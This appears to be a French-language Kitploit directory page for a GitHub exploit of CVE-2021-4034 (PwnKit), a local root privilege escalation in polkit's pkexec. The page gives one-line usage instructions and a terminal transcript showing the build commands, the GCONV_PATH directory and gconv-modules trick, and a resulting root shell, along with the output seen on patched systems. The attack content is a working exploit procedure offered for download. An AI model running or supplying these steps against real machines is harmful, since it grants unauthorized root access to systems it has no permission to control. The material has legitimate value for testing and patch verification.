Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-4034 — Exploit pour CVE-2021-4034, une élévation de privilèges locale dans pkexec de polkit, fournissant un shell root via une bibliothèque partagée et une manipulation du chemin GCONV. | Kitploit
Outils/GitHubGitHub/vilasboasph/cve-2021-4034
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationDéveloppement de Charges UtilesExploitation de Binaires
GitHubvilasboasph/cve-2021-4034

CVE-2021-4034

Exploit pour CVE-2021-4034, une élévation de privilèges locale dans pkexec de polkit, fournissant un shell root via une bibliothèque partagée et une manipulation du chemin GCONV.

Voir le dépôt
1il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-4034

Un jour pour l'exploit d'élévation de privilèges polkit

Exécutez simplement make, ./cve-2021-4034 et profitez de votre shell root.

L'avis original des véritables auteurs est ici

PoC

Si l'exploit fonctionne, vous obtiendrez un shell root immédiatement :

root@kitploit:~
localuser@ubuntu-poc:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

La mise à jour de polkit sur la plupart des systèmes corrigera l'exploit, vous obtiendrez donc l'utilisation et le programme se terminera :

root@kitploit:~
localuser@ubuntu-poc:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
localuser@ubuntu-poc:~/CVE-2021-4034$
Télécharger l’outil